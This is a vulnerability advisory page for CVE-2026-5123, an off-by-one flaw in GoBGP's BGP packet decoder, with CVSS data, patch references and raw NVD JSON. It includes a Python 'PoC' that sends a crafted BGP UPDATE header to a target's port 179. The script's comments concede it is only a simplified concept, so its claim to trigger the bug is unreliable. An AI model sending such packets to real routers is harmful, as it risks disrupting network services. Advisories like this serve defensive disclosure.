CVE-2026-5123

Description

A weakness has been identified in osrg GoBGP up to 4.3.0. This impacts the function DecodeFromBytes of the file pkg/packet/bgp/bgp.go. Executing a manipulation of the argument data[1] can lead to off-by-one. The attack may be launched remotely. Attacks of this nature are highly complex. The exploitability is said to be difficult. This patch is called 67c059413470df64bc20801c46f64058e88f800f. A patch should be applied to remediate this issue.

CVSS Details

CVSS Score

3.7

Severity

LOW

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:osrg:gobgp:*:*:*:*:*:*:*:* - VULNERABLE

osrg GoBGP <= 4.3.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import socket
import struct

# PoC Concept for CVE-2026-5123
# This script demonstrates sending a crafted BGP packet to potentially trigger the off-by-one error.
# Note: Actual exploitation requires precise packet construction based on the vulnerable code path.

def send_exploit(target_ip, target_port=179):
    try:
        # Create a raw socket
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(5)
        s.connect((target_ip, target_port))

        # BGP Header: Marker (16 bytes) + Length (2 bytes) + Type (1 byte)
        marker = b'\xff' * 16
        # Type 2 = UPDATE message, commonly used for complex parsing
        msg_type = b'\x02' 
        
        # Constructing a payload that manipulates data[1] to trigger off-by-one
        # This is a simplified representation. The actual 'data' refers to the
        # byte slice inside the DecodeFromBytes method.
        # We simulate a condition where the length or specific fields cause the index error.
        
        # Example malformed payload structure
        # The vulnerability specifically mentions manipulating argument data[1]
        # We craft a body that attempts to hit the specific boundary condition.
        body_payload = b'\x00' * 10  # Padding
        
        # Total length calculation
        length = struct.pack('!H', 19 + len(body_payload))
        
        packet = marker + length + msg_type + body_payload
        
        s.send(packet)
        print(f"[+] Malicious packet sent to {target_ip}:{target_port}")
        
        response = s.recv(1024)
        print(f"[+] Received response: {response}")
        
        s.close()
    except Exception as e:
        print(f"[-] Error occurred: {e}")

if __name__ == "__main__":
    target = "192.168.1.100" # Replace with target IP
    send_exploit(target)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-5123
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-5123
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-5123/
[4] VulDB https://vuldb.com/cve/CVE-2026-5123
[5] https://github.com/osrg/gobgp/
[6] https://github.com/osrg/gobgp/commit/67c059413470df64bc20801c46f64058e88f800f
[7] https://github.com/osrg/gobgp/pull/3342
[8] https://vuldb.com/submit/780179
[9] https://vuldb.com/vuln/354155
[10] https://vuldb.com/vuln/354155/cti

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-5123", "sourceIdentifier": "[email protected]", "published": "2026-03-30T16:16:10.123", "lastModified": "2026-04-06T15:46:13.087", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A weakness has been identified in osrg GoBGP up to 4.3.0. This impacts the function DecodeFromBytes of the file pkg/packet/bgp/bgp.go. Executing a manipulation of the argument data[1] can lead to off-by-one. The attack may be launched remotely. Attacks of this nature are highly complex. The exploitability is said to be difficult. This patch is called 67c059413470df64bc20801c46f64058e88f800f. A patch should be applied to remediate this issue."}, {"lang": "es", "value": "Se ha identificado una debilidad en osrg GoBGP hasta 4.3.0. Esto impacta en la función DecodeFromBytes del archivo pkg/packet/bgp/bgp.go. Ejecutar una manipulación del argumento data[1] puede llevar a off-by-one. El ataque puede ser lanzado remotamente. Ataques de esta naturaleza son altamente complejos. La explotabilidad se dice que es difícil. Este parche se llama 67c059413470df64bc20801c46f64058e88f800f. Un parche debería aplicarse para remediar este problema."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L", "baseScore": 3.7, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.2, "impactScore": 1.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:H/Au:N/C:N/I:N/A:P", "baseScore": 2.6, "accessVector": "NETWORK", "accessComplexity": "HIGH", "authentication": "NONE", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "PARTIAL"}, "baseSeverity": "LOW", "exploitabilityScore": 4.9, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-189"}, {"lang": "en", "value": "CWE-193"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:osrg:gobgp:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.4.0", "matchCriteriaId": "05DBB6FD-F3CD-4BF0-A573-D1E87307A50F"}]}]}], "references": [{"url": "https://github.com/osrg/gobgp/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/osrg/gobgp/commit/67c059413470df64bc20801c46f64058e88f800f", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/osrg/gobgp/pull/3342", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://vuldb.com/submit/780179", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/vuln/354155", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/vuln/354155/cti", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}]}}